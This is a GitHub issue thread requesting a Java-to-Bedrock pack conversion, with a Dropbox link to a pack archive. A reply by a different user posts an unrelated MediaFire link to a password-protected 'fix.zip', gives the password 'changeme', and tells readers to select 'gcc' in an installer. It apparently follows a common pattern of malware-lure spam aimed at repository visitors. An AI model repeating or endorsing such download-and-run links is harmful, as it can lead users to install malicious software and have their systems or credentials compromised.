### ISSUE TITLE
[Pack]: test2

### ISSUE THREAD

**Issue by Faryha** [Kas-tle/java2bedrock.sh#33497]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/6bizhkiranz8kkujyt1od/pack.zip?rlkey=o792km86cbwjf8a94ib51ymvq&st=jfm9qc8z&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
